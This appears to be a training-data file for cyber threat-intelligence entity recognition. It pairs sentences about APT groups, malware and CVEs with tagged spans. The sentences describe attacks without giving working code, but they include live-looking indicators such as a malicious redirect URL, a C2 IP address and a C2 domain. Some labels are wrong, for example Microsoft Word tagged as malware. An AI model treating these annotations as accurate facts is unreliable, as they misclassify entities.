In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER .", "spans": {"MALWARE: Triada": [[0, 6]], "SYSTEM: Android": [[28, 35]], "VULNERABILITY: CVE-2017-0143": [[40, 53]], "MALWARE: tools—EternalRomance": [[89, 109]], "MALWARE: EternalSynergy—that": [[114, 133]], "THREAT_ACTOR: APT34": [[225, 230]], "TOOL: Microsoft Office": [[252, 268]], "VULNERABILITY: CVE-2017-11882": [[283, 297]], "MALWARE: POWRUNER": [[308, 316]], "MALWARE: BONDUPDATER": [[321, 332]]}, "info": {"id": "cyberner_stix_train_001233", "source": "cyberner_stix_train"}} {"text": "] 144 [ . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea . In the case of old Windows versions like XP , main module events.exe runs an edited XPTask.vbs Microsoft sample script to create a weekly scheduled task for . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": {"THREAT_ACTOR: APT37": [[10, 15]], "SYSTEM: Windows": [[161, 168]], "SYSTEM: XP": [[183, 185]], "FILEPATH: events.exe": [[200, 210]], "FILEPATH: XPTask.vbs": [[226, 236]], "ORGANIZATION: Microsoft": [[237, 246]]}, "info": {"id": "cyberner_stix_train_001234", "source": "cyberner_stix_train"}} {"text": "Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” . 
This malware is responsible for stealing Bluetooth device information .", "spans": {"MALWARE: BMW_x1”": [[584, 591]], "MALWARE: BMW_x2”": [[594, 601]], "MALWARE: BMW_x8”": [[612, 619]], "TOOL: Bluetooth": [[663, 672]]}, "info": {"id": "cyberner_stix_train_001235", "source": "cyberner_stix_train"}} {"text": "In October 2017 , AhnLab published a report called \" Operation Bitter Biscuit \" , an attack campaign against South Korea , Japan , India and Russia using Bisonal and its successors , Bioazih and Dexbia . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": {"ORGANIZATION: AhnLab": [[18, 24]], "TOOL: Bisonal": [[154, 161]], "TOOL: Bioazih": [[183, 190]], "TOOL: Dexbia": [[195, 201]], "MALWARE: Carbanak": [[232, 240]], "ORGANIZATION: banks": [[274, 279]]}, "info": {"id": "cyberner_stix_train_001236", "source": "cyberner_stix_train"}} {"text": "At this time , we do not believe that the attackers found a new ASA exploit . However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before .", "spans": {"ORGANIZATION: we": [[15, 17]], "THREAT_ACTOR: attackers": [[42, 51]], "VULNERABILITY: ASA": [[64, 67]], "VULNERABILITY: exploit": [[68, 75]]}, "info": {"id": "cyberner_stix_train_001237", "source": "cyberner_stix_train"}} {"text": "To do this , the actor may have used a unique tool called Atmosphere , a Trojan developed by Silence to remotely control ATM dispensers , or a similar program called xfs-disp.exe , which the actor may have used in their attack on IT Bank . 
The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"TOOL: Atmosphere": [[58, 68]], "THREAT_ACTOR: Silence": [[93, 100]], "MALWARE: xfs-disp.exe": [[166, 178]], "ORGANIZATION: Bank": [[233, 237]], "THREAT_ACTOR: attackers": [[244, 253]], "TOOL: emails": [[268, 274]], "FILEPATH: XLS files": [[300, 309]], "ORGANIZATION: employees working in the banking sector": [[313, 352]]}, "info": {"id": "cyberner_stix_train_001238", "source": "cyberner_stix_train"}} {"text": "The simpler one will connect to a hardcoded C&C server over HTTP or HTTPS to download commands to execute .", "spans": {"TOOL: C&C": [[44, 47]]}, "info": {"id": "cyberner_stix_train_001239", "source": "cyberner_stix_train"}} {"text": "We identified infrastructure overlaps and string references to previous Wolf Research work . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 . In addition , the IXESHE attackers conducted two specific attacks that leveraged zero-day exploits—one in 2009 and another in 2011 . 
In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"ORGANIZATION: Wolf Research": [[72, 85]], "TOOL: Winnti family of malware": [[148, 172]], "THREAT_ACTOR: IXESHE": [[304, 310]], "VULNERABILITY: zero-day": [[367, 375]], "VULNERABILITY: the complexity of managing CSP rules": [[434, 470]], "VULNERABILITY: vulnerability": [[478, 491]], "SYSTEM: Google Analytics": [[531, 547]]}, "info": {"id": "cyberner_stix_train_001240", "source": "cyberner_stix_train"}} {"text": "Use of the virtual machine brings many technical benefits to the operators , chief among them allowing the malware to install apps without requiring users to approve a list of elevated permissions . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The malware also features a destructive component , which can wipe the master boot record of an infected computer . Beyond Ukraine , the group continues to sustain espionage operations that are global in scope and illustrative of the Russian military 's far - reaching ambitions and interests in other regions .", "spans": {"TOOL: DDoS malware": [[199, 211]], "THREAT_ACTOR: espionage operations": [[515, 535]]}, "info": {"id": "cyberner_stix_train_001241", "source": "cyberner_stix_train"}} {"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats . 
It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) .", "spans": {"ORGANIZATION: QiAnXin": [[22, 29]], "THREAT_ACTOR: Molerats": [[68, 76]], "TOOL: Word": [[93, 97]], "FILEPATH: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[133, 169]], "FILEPATH: Update.exe": [[201, 211]], "TOOL: DLL": [[218, 221]], "FILEPATH: McUpdate.dll": [[224, 236]]}, "info": {"id": "cyberner_stix_train_001242", "source": "cyberner_stix_train"}} {"text": "PinchDuke will also search for files that have been created within a predefined timeframe and whose file extension is present in a predefined list .", "spans": {"MALWARE: PinchDuke": [[0, 9]]}, "info": {"id": "cyberner_stix_train_001243", "source": "cyberner_stix_train"}} {"text": "The researchers wrote : While profit is powerful motivation for any attacker , Yingmob ’ s apparent self-sufficiency and organizational structure make it well-positioned to expand into new business ventures , including productizing the access to the 85 million Android devices it controls . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation . APT33 : 64.251.19.214 mynetwork.ddns.net . Another example would be that of a person selling illicit products on the dark web .", "spans": {"ORGANIZATION: Yingmob": [[79, 86]], "SYSTEM: Android": [[261, 268]], "ORGANIZATION: FBI": [[291, 294]], "THREAT_ACTOR: HIDDEN COBRA actors": [[320, 339]], "THREAT_ACTOR: APT33": [[481, 486]], "IP_ADDRESS: 64.251.19.214": [[489, 502]], "DOMAIN: mynetwork.ddns.net": [[503, 521]]}, "info": {"id": "cyberner_stix_train_001244", "source": "cyberner_stix_train"}} {"text": "When done , the bot is functional and ready to receive commands and perform overlay attacks . 
In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co Ltd and Laoying Baichen Instruments Equipment Co Ltd . These domains were registered through the privacy protection services in 2008 and 2011 .", "spans": {"THREAT_ACTOR: APT10": [[135, 140]], "ORGANIZATION: Tianjin-based companies": [[168, 191]], "ORGANIZATION: Huaying Haitai Science": [[204, 226]]}, "info": {"id": "cyberner_stix_train_001245", "source": "cyberner_stix_train"}} {"text": "Evolution of Rotexy 2014–2015 Since the malicious program was detected in 2014 , its main functions and propagation method have not changed : Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks—such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank—in recent history .", "spans": {"MALWARE: Rotexy": [[13, 19], [142, 148]], "TOOL: SYSCON": [[354, 360]], "MALWARE: malicious Word documents": [[389, 413]], "ORGANIZATION: government": [[581, 591]], "THREAT_ACTOR: actors": [[607, 613]]}, "info": {"id": "cyberner_stix_train_001246", "source": "cyberner_stix_train"}} {"text": "CTU researchers identified a variety of post-compromise tools stored under %AppData% ( e.g. 
, \\AppData\\Roaming\\Temp ) on several compromised systems .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001247", "source": "cyberner_stix_train"}} {"text": "This instruction is especially important for malware that tries to avoid user interaction by running in the background as a service . The actors frequently use the stolen data to create cloned physical cards , which they use to attempt to withdraw funds from ATMs . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells .", "spans": {"THREAT_ACTOR: actors": [[138, 144]], "THREAT_ACTOR: OilRig": [[276, 282], [382, 388]], "MALWARE: delivery documents": [[428, 446]], "MALWARE: TwoFace webshells": [[457, 474]]}, "info": {"id": "cyberner_stix_train_001248", "source": "cyberner_stix_train"}} {"text": "We will continue to monitor this ransomware family to ensure customers are protected and to share our findings and insights to the community for broad protection against these evolving mobile threats . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . considering multiple control flow dispatchers and various jump cases for control flow flattening . 
The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": {"THREAT_ACTOR: Ke3chang": [[202, 210]], "VULNERABILITY: Java zero-day vulnerability": [[232, 259]], "VULNERABILITY: CVE-2012-4681": [[262, 275]], "MALWARE: Microsoft Word": [[321, 335]], "VULNERABILITY: CVE-2010-3333": [[338, 351]], "TOOL: Adobe PDF Reader": [[358, 374]], "VULNERABILITY: CVE-2010-2883": [[377, 390]], "TOOL: Python script": [[524, 537]], "ORGANIZATION: CrowdStrike researchers": [[565, 588]], "THREAT_ACTOR: Play ransomware attacks": [[631, 654]]}, "info": {"id": "cyberner_stix_train_001249", "source": "cyberner_stix_train"}} {"text": "To illustrate the level of threat the DEFENSOR ID app posed , we performed three tests . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence .", "spans": {"MALWARE: DEFENSOR ID": [[38, 49]], "THREAT_ACTOR: Turla": [[116, 121]], "TOOL: PowerShell": [[131, 141]], "THREAT_ACTOR: HIDDEN COBRA actors": [[217, 236]], "MALWARE: FALLCHILL": [[249, 258]], "MALWARE: malware": [[259, 266]]}, "info": {"id": "cyberner_stix_train_001250", "source": "cyberner_stix_train"}} {"text": "At runtime , the packer decompresses the resource and uses Reflection to load the assembly , find its Entry point , and Invoke it .", "spans": {}, "info": {"id": "cyberner_stix_train_001251", "source": "cyberner_stix_train"}} {"text": "With the Kelihos spam botnet no longer in operation and Levashov behind bars , multiple criminal operators turned to different spam botnets to distribute their crimeware . 
While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": {"TOOL: Kelihos spam botnet": [[9, 28]], "ORGANIZATION: Secureworks": [[211, 222]], "THREAT_ACTOR: BRONZE BUTLER": [[234, 247]], "VULNERABILITY: CVE-2016-7836": [[314, 327]]}, "info": {"id": "cyberner_stix_train_001252", "source": "cyberner_stix_train"}} {"text": "Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan in which they are interacting .", "spans": {"MALWARE: Trojan": [[157, 163], [290, 296]], "TOOL: C2": [[198, 200]]}, "info": {"id": "cyberner_stix_train_001253", "source": "cyberner_stix_train"}} {"text": "Kaspersky Lab’s experts calculated the amount of stolen data stored on NetTraveler’s C&C servers to be more than 22 gigabytes . Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker’s server . Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . 
The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . 
AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea’s media , manufacturing and universities , around February and March 2019 . SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . 
In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . Now , Silence is one of the most active threat actors targeting the financial sector . Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence’s activity . Since the report’s release in September 2018 , Group-IB’s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . Like the majority of APT groups , Silence uses phishing as their infection vector . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . 
Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Group-IB has also detected recon emails sent out to New Zealand . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . 
As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .lNK shortcuts as malicious attachments .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: NetTraveler’s": [[71, 84]], "THREAT_ACTOR: SectorJ04": [[176, 185], [390, 399], [659, 668], [1196, 1205], [1223, 1232], [1321, 1330], [1450, 1459], [1886, 1895], [2091, 2100], [2405, 2414], [2773, 2782], [2876, 2885], [3239, 3248], [3557, 3566], [3811, 3820], [4015, 4024], [4191, 4200], [4379, 4388], [4508, 4517], [4658, 4667], [4869, 4878]], "TOOL: email": [[203, 208], [3179, 3184], [3485, 3490], [3917, 3922], [4225, 4230], [5107, 5112]], "MALWARE: backdoors": [[264, 273]], "FILEPATH: Backdoor": [[276, 284]], "MALWARE: AdroMut": [[457, 464], [1124, 1131], [2675, 2682]], "MALWARE: FlowerPippi": [[469, 480], [1157, 1168], [2687, 2698]], "THREAT_ACTOR: attacker’s": [[626, 636], [4321, 4331]], "FILEPATH: email stealer": [[846, 859]], "TOOL: Outlook": [[996, 1003]], "TOOL: Thunderbird": [[1008, 1019]], "MALWARE: exploit kits": [[1532, 1544]], "MALWARE: Locky": [[1589, 1594]], "MALWARE: GlobeImporter": [[1599, 1612]], "ORGANIZATION: banking": [[1630, 1637]], "MALWARE: Trojan": [[1638, 1644]], "THREAT_ACTOR: SectorJ04's": [[1700, 1711]], "TOOL: emails": [[1771, 1777], [2136, 2142], [2232, 2238], [2335, 2341], [5090, 5096], [6952, 6958], [7154, 7160], [7370, 7376], [7597, 7603], [8023, 8029]], "ORGANIZATION: electronics": [[2470, 2481]], "ORGANIZATION: telecommunications": [[2486, 2504]], "ORGANIZATION: international": [[2507, 2520]], "ORGANIZATION: manufacturing": [[2533, 2546], [4125, 4138]], "MALWARE: ServHelper": [[2590, 2600], [2731, 2741]], "MALWARE: FlawedAmmy": [[2605, 2615], [2746, 2756]], "MALWARE: ransomware": [[3332, 3342]], "MALWARE: banking trojans": [[3347, 3362]], "ORGANIZATION: companies": [[3982, 3991]], "ORGANIZATION: media": [[4117, 4122]], "ORGANIZATION: universities": [[4143, 4155]], "TOOL: Word": [[4270, 4274]], 
"ORGANIZATION: financial": [[4434, 4443], [4565, 4574], [5445, 5454]], "ORGANIZATION: education": [[4772, 4781]], "ORGANIZATION: job openings": [[4784, 4796]], "ORGANIZATION: real estate": [[4799, 4810]], "ORGANIZATION: semiconductors": [[4815, 4829]], "THREAT_ACTOR: groups": [[5264, 5270]], "THREAT_ACTOR: Silence": [[5383, 5390], [5665, 5672], [5801, 5808], [6275, 6282], [6319, 6326], [6820, 6827], [7095, 7102], [7323, 7330], [7461, 7468], [7565, 7572], [7991, 7998]], "THREAT_ACTOR: Silence:": [[5504, 5512]], "ORGANIZATION: Group-IB's": [[5637, 5647]], "MALWARE: Ivoke": [[5828, 5833]], "MALWARE: EDA agent": [[5860, 5869]], "TOOL: PowerShell": [[5888, 5898]], "ORGANIZATION: Going Global": [[5914, 5926]], "THREAT_ACTOR: Silence’s activity": [[6117, 6135]], "ORGANIZATION: Group-IB’s": [[6185, 6195]], "ORGANIZATION: banks": [[6257, 6262], [7380, 7385]], "THREAT_ACTOR: Group-IB’s": [[6580, 6590], [7720, 7730]], "THREAT_ACTOR: actor’s": [[6944, 6951]], "FILEPATH: malicious payload": [[7005, 7022]], "ORGANIZATION: users": [[7087, 7092]], "ORGANIZATION: Group-IB": [[7226, 7234]], "FILEPATH: recon emails": [[7253, 7265]], "ORGANIZATION: Asian market": [[7503, 7515]], "THREAT_ACTOR: Silence’s": [[7774, 7783]], "THREAT_ACTOR: silence": [[8119, 8126]], "ORGANIZATION: Microsoft": [[8138, 8147]], "FILEPATH: .lNK": [[8207, 8211]]}, "info": {"id": "cyberner_stix_train_001254", "source": "cyberner_stix_train"}} {"text": "And later 2016 , their focus turned towards the Olympics ’ and the World Anti-Doping Agency ( WADA ) and Court of Arbitration for Sports ( CAS ) , when individuals and servers in these organizations were phished and compromised .", "spans": {"ORGANIZATION: Olympics": [[48, 56]], "ORGANIZATION: World Anti-Doping Agency": [[67, 91]], "ORGANIZATION: WADA": [[94, 98]], "ORGANIZATION: Court of Arbitration for Sports": [[105, 136]], "ORGANIZATION: CAS": [[139, 142]]}, "info": {"id": "cyberner_stix_train_001255", "source": "cyberner_stix_train"}} {"text": "This command 
is used to connect the victim to a Wi-Fi network controlled by the cybercriminals to perform traffic sniffing and man-in-the-middle ( MitM ) attacks . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . APT39 is Oan Iranian cyber espionage group that has been active since at least 2014 .", "spans": {"THREAT_ACTOR: NewsBeef": [[191, 199]], "THREAT_ACTOR: APT39": [[348, 353]]}, "info": {"id": "cyberner_stix_train_001256", "source": "cyberner_stix_train"}} {"text": "Figure 6 – Ransomware component Anubis has been known to utilize Twitter or Telegram to retrieve the C2 address and this sample is no exception ( Figure 7 ) . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"MALWARE: Anubis": [[32, 38]], "ORGANIZATION: Twitter": [[65, 72]], "ORGANIZATION: Telegram": [[76, 84]], "THREAT_ACTOR: ScarCruft": [[320, 329]], "MALWARE: FakeSG": [[480, 486]]}, "info": {"id": "cyberner_stix_train_001257", "source": "cyberner_stix_train"}} {"text": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity .", "spans": {}, "info": {"id": "cyberner_stix_train_001258", "source": "cyberner_stix_train"}} {"text": "It uses the base Dalvik User-Agent string for the device it ’ s running on . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . TAU investigated the ANEL obfuscation algorithms then modified the HexRaysDeob code to defeat the obfuscations . 
Further analyses of these similarities are available via Mandiant Advantage .", "spans": {"ORGANIZATION: banks": [[110, 115]], "ORGANIZATION: media": [[118, 123]], "ORGANIZATION: government agencies": [[130, 149]], "THREAT_ACTOR: APT38": [[177, 182]], "ORGANIZATION: TAU": [[204, 207]], "MALWARE: ANEL": [[225, 229]], "TOOL: HexRaysDeob": [[271, 282]], "ORGANIZATION: Mandiant Advantage": [[374, 392]]}, "info": {"id": "cyberner_stix_train_001259", "source": "cyberner_stix_train"}} {"text": "Memory collection and analysis can be an extremely valuable component of an incident response plan and in this case proved crucial in identifying TG-1314 's actions on objective .", "spans": {"THREAT_ACTOR: TG-1314": [[146, 153]]}, "info": {"id": "cyberner_stix_train_001260", "source": "cyberner_stix_train"}} {"text": "If the file exists it then moves it to “ __tmpdt.tmp ” in the same directory and continues the installation .", "spans": {"FILEPATH: __tmpdt.tmp": [[41, 52]]}, "info": {"id": "cyberner_stix_train_001261", "source": "cyberner_stix_train"}} {"text": "Figure 6 . The Magic Hound attacks did not rely on exploit code to compromise targeted systems , instead relying on Excel and Word documents containing malicious macros . 
Second stage samples ( Win64/Winnti.BN ) A clever example was ‘ Office Monkeys LOL Video.zip ’ .", "spans": {"FILEPATH: Win64/Winnti.BN": [[194, 209]]}, "info": {"id": "cyberner_stix_train_001262", "source": "cyberner_stix_train"}} {"text": "DeltaCharlie is a DDoS tool capable of launching Domain Name System ( DNS ) attacks , Network Time Protocol ( NTP ) attacks , and Carrier Grade NAT ( CGN ) attacks .", "spans": {"MALWARE: DeltaCharlie": [[0, 12]], "TOOL: Domain Name System": [[49, 67]], "TOOL: DNS": [[70, 73]], "TOOL: Carrier Grade NAT": [[130, 147]], "TOOL: CGN": [[150, 153]]}, "info": {"id": "cyberner_stix_train_001263", "source": "cyberner_stix_train"}} {"text": "There have also been cases of users in Ukraine , Germany , Turkey and several other countries being affected . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . FireEye is highlighting a Cyber Espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": {"MALWARE: CONFUCIUS_B": [[127, 138]], "MALWARE: CONFUCIUS_A": [[161, 172]], "TOOL: SFX binary files": [[211, 227]], "ORGANIZATION: FireEye": [[230, 237]], "THREAT_ACTOR: actor": [[385, 390]], "THREAT_ACTOR: APT40": [[399, 404]]}, "info": {"id": "cyberner_stix_train_001264", "source": "cyberner_stix_train"}} {"text": "The DllMain function is identical and starts the main thread ; the “ Applicate ” function is identical to the one in the newer library .", "spans": {}, "info": {"id": "cyberner_stix_train_001265", "source": "cyberner_stix_train"}} {"text": "The report documented an advanced threat group they attributed to China .", "spans": {}, "info": {"id": "cyberner_stix_train_001266", "source": "cyberner_stix_train"}} {"text": "It had again cloned a different legitimate Japanese website to host its malicious app , similar to what FakeSpy had also done before . 
APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy . This query uses a receive structure similar to an M action; it is worth noting all of the receiver operation queries made in ping mode use the [System.Net.Dns]::GetHostAddresses . We assess \" pack\\scil\\s1.txt \" is likely a file containing SCIL commands the attackers executed in MicroSCADA .", "spans": {"MALWARE: FakeSpy": [[104, 111]], "THREAT_ACTOR: APT19": [[135, 140]], "ORGANIZATION: defense sector firms": [[166, 186]], "ORGANIZATION: political , financial , pharmaceutical and energy sectors": [[218, 275]]}, "info": {"id": "cyberner_stix_train_001267", "source": "cyberner_stix_train"}} {"text": "All the detections of this backdoored app were geolocated in Iran . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . It has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {"ORGANIZATION: Palo Alto": [[83, 92]], "THREAT_ACTOR: DarkHydrus": [[103, 113]], "ORGANIZATION: governments": [[157, 168]]}, "info": {"id": "cyberner_stix_train_001268", "source": "cyberner_stix_train"}} {"text": "The second script calls VirtualAlloc to create a buffer , uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread .", "spans": {"MALWARE: The second script": [[0, 17]]}, "info": {"id": "cyberner_stix_train_001269", "source": "cyberner_stix_train"}} {"text": "Once installed , it displayed the icon found in the actual Netflix app on Google Play . Group-IB has also detected recon emails sent out to New Zealand . 
Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group .", "spans": {"SYSTEM: Netflix app": [[59, 70]], "SYSTEM: Google Play": [[74, 85]], "ORGANIZATION: Group-IB": [[88, 96]], "MALWARE: recon emails": [[115, 127]], "ORGANIZATION: Kaspersky": [[192, 201]], "THREAT_ACTOR: Anunak": [[250, 256]], "ORGANIZATION: banks": [[275, 280], [338, 343]]}, "info": {"id": "cyberner_stix_train_001270", "source": "cyberner_stix_train"}} {"text": "Currently , the Twitoor trojan has been downloading several versions of mobile banking malware . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.” These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years .", "spans": {"MALWARE: Twitoor": [[16, 23]], "THREAT_ACTOR: Scattered Canary": [[133, 149]], "THREAT_ACTOR: Lazarus": [[410, 417]], "ORGANIZATION: banking sector": [[464, 478]], "ORGANIZATION: finance": [[481, 488]], "ORGANIZATION: trading companies": [[495, 512]], "ORGANIZATION: casinos": [[526, 533]]}, "info": {"id": "cyberner_stix_train_001271", "source": "cyberner_stix_train"}} {"text": "This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more . 
